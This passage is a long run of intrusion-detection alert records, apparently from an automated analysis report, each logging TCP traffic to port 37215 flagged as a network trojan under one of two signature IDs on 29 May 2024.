                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928830
                SID:2829579
                Source Port:46956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857016
                SID:2835222
                Source Port:55850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728557
                SID:2829579
                Source Port:43578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938795
                SID:2835222
                Source Port:35102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719609
                SID:2829579
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799595
                SID:2835222
                Source Port:53510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933293
                SID:2829579
                Source Port:58206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821979
                SID:2835222
                Source Port:50484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567927
                SID:2835222
                Source Port:49766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802015
                SID:2835222
                Source Port:60086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022481
                SID:2829579
                Source Port:42856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835848
                SID:2835222
                Source Port:34570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275986
                SID:2835222
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776812
                SID:2829579
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653990
                SID:2829579
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511499
                SID:2835222
                Source Port:56496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517451
                SID:2829579
                Source Port:44946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207902
                SID:2835222
                Source Port:47900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321697
                SID:2835222
                Source Port:34926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941848
                SID:2835222
                Source Port:41500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039820
                SID:2829579
                Source Port:55274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911041
                SID:2829579
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915102
                SID:2829579
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163998
                SID:2835222
                Source Port:48688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175723
                SID:2829579
                Source Port:56358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840125
                SID:2829579
                Source Port:39738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418718
                SID:2835222
                Source Port:47508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816778
                SID:2835222
                Source Port:58366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358675
                SID:2829579
                Source Port:35184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611131
                SID:2829579
                Source Port:46678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967646
                SID:2835222
                Source Port:44222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325916
                SID:2835222
                Source Port:45624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416552
                SID:2835222
                Source Port:49542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871668
                SID:2829579
                Source Port:35758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841725
                SID:2835222
                Source Port:60514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782999
                SID:2835222
                Source Port:41924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329602
                SID:2829579
                Source Port:39866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371286
                SID:2829579
                Source Port:33390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763677
                SID:2829579
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968752
                SID:2829579
                Source Port:33936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781828
                SID:2835222
                Source Port:56910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583997
                SID:2829579
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265120
                SID:2829579
                Source Port:58362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982148
                SID:2835222
                Source Port:38460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830823
                SID:2835222
                Source Port:57278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559543
                SID:2829579
                Source Port:51956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001150
                SID:2835222
                Source Port:37054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668503
                SID:2829579
                Source Port:39054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716741
                SID:2829579
                Source Port:46030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559232
                SID:2829579
                Source Port:40830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221843
                SID:2835222
                Source Port:44304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640718
                SID:2835222
                Source Port:34218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227328
                SID:2835222
                Source Port:60722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574331
                SID:2835222
                Source Port:46962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073816
                SID:2829579
                Source Port:40902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175513
                SID:2835222
                Source Port:52394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944899
                SID:2829579
                Source Port:49944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870141
                SID:2829579
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184690
                SID:2835222
                Source Port:36414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728615
                SID:2835222
                Source Port:34384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504651
                SID:2835222
                Source Port:39818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675276
                SID:2835222
                Source Port:58068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022461
                SID:2835222
                Source Port:56780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686388
                SID:2835222
                Source Port:44906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854525
                SID:2835222
                Source Port:60644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993821
                SID:2829579
                Source Port:40794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929036
                SID:2835222
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816134
                SID:2829579
                Source Port:55262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264331
                SID:2835222
                Source Port:57128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969745
                SID:2835222
                Source Port:57598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223261
                SID:2829579
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.366116
                SID:2835222
                Source Port:40410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914251
                SID:2835222
                Source Port:41620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852472
                SID:2835222
                Source Port:46682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239626
                SID:2829579
                Source Port:35300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567714
                SID:2835222
                Source Port:47172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032631
                SID:2829579
                Source Port:42816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329319
                SID:2829579
                Source Port:47104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714302
                SID:2835222
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789315
                SID:2835222
                Source Port:36936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075166
                SID:2829579
                Source Port:44076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181521
                SID:2829579
                Source Port:35906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687006
                SID:2829579
                Source Port:32930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612861
                SID:2829579
                Source Port:41508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932123
                SID:2835222
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984224
                SID:2829579
                Source Port:58700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155514
                SID:2835222
                Source Port:36324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473347
                SID:2829579
                Source Port:57456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.898196
                SID:2835222
                Source Port:56334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.921271
                SID:2829579
                Source Port:36434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655874
                SID:2835222
                Source Port:59896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912391
                SID:2829579
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915599
                SID:2835222
                Source Port:34496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964124
                SID:2829579
                Source Port:53908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842215
                SID:2835222
                Source Port:34352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397219
                SID:2835222
                Source Port:42030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420052
                SID:2829579
                Source Port:33568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.933328
                SID:2835222
                Source Port:55622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798715
                SID:2829579
                Source Port:54904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885720
                SID:2829579
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265283
                SID:2835222
                Source Port:57576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369747
                SID:2829579
                Source Port:49182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.939866
                SID:2829579
                Source Port:51434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573895
                SID:2835222
                Source Port:39266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871560
                SID:2835222
                Source Port:57502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442095
                SID:2829579
                Source Port:41126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034876
                SID:2835222
                Source Port:56768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665302
                SID:2829579
                Source Port:47604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140392
                SID:2829579
                Source Port:60234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359455
                SID:2829579
                Source Port:42498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420365
                SID:2829579
                Source Port:40314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069745
                SID:2835222
                Source Port:52618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583531
                SID:2829579
                Source Port:57920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521782
                SID:2835222
                Source Port:54728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763363
                SID:2829579
                Source Port:33926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013579
                SID:2835222
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853306
                SID:2835222
                Source Port:37072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928353
                SID:2835222
                Source Port:52242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461323
                SID:2835222
                Source Port:56060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965393
                SID:2829579
                Source Port:43980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909722
                SID:2835222
                Source Port:43884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.828529
                SID:2829579
                Source Port:42232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728298
                SID:2835222
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897505
                SID:2835222
                Source Port:44826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088016
                SID:2835222
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799458
                SID:2835222
                Source Port:58778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870012
                SID:2829579
                Source Port:43040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893982
                SID:2829579
                Source Port:37458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330310
                SID:2829579
                Source Port:59272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.170998
                SID:2835222
                Source Port:51758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980027
                SID:2829579
                Source Port:39738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989665
                SID:2835222
                Source Port:60080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025722
                SID:2829579
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788473
                SID:2835222
                Source Port:48176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900546
                SID:2835222
                Source Port:56100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586396
                SID:2829579
                Source Port:33770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418274
                SID:2829579
                Source Port:43478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826883
                SID:2835222
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422363
                SID:2829579
                Source Port:54056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719464
                SID:2829579
                Source Port:52130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281531
                SID:2835222
                Source Port:50834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438130
                SID:2829579
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855816
                SID:2829579
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.880855
                SID:2829579
                Source Port:44770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639790
                SID:2829579
                Source Port:33896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042567
                SID:2835222
                Source Port:49562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786910
                SID:2829579
                Source Port:55864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465422
                SID:2829579
                Source Port:50322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438749
                SID:2835222
                Source Port:51580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689203
                SID:2835222
                Source Port:38292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042909
                SID:2829579
                Source Port:37576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675478
                SID:2835222
                Source Port:60418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.764001
                SID:2829579
                Source Port:48556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685560
                SID:2829579
                Source Port:49070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897631
                SID:2829579
                Source Port:50156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265337
                SID:2829579
                Source Port:40106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942961
                SID:2835222
                Source Port:45250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694374
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883117
                SID:2829579
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668996
                SID:2829579
                Source Port:56924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374195
                SID:2829579
                Source Port:58102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596806
                SID:2835222
                Source Port:45506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.613852
                SID:2829579
                Source Port:54150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574685
                SID:2835222
                Source Port:55034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325372
                SID:2829579
                Source Port:40592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279162
                SID:2829579
                Source Port:60748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948565
                SID:2835222
                Source Port:60032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740449
                SID:2829579
                Source Port:40232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660121
                SID:2829579
                Source Port:51242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417390
                SID:2835222
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902904
                SID:2829579
                Source Port:34532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162303
                SID:2829579
                Source Port:37148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664562
                SID:2829579
                Source Port:33224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943212
                SID:2835222
                Source Port:41566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.451186
                SID:2835222
                Source Port:52904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108902
                SID:2835222
                Source Port:40638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715418
                SID:2835222
                Source Port:37658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583936
                SID:2835222
                Source Port:45504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716226
                SID:2829579
                Source Port:60162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220948
                SID:2835222
                Source Port:39218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887702
                SID:2829579
                Source Port:56904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858101
                SID:2835222
                Source Port:57034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166339
                SID:2835222
                Source Port:52780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820704
                SID:2829579
                Source Port:50216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944499
                SID:2835222
                Source Port:33446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058397
                SID:2829579
                Source Port:57524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321750
                SID:2829579
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660406
                SID:2829579
                Source Port:56570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763124
                SID:2835222
                Source Port:41056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262439
                SID:2829579
                Source Port:39558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278784
                SID:2835222
                Source Port:54090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941306
                SID:2835222
                Source Port:33016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.733808
                SID:2829579
                Source Port:46164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519853
                SID:2835222
                Source Port:43588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863025
                SID:2829579
                Source Port:43682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449690
                SID:2829579
                Source Port:42170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916959
                SID:2835222
                Source Port:37540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
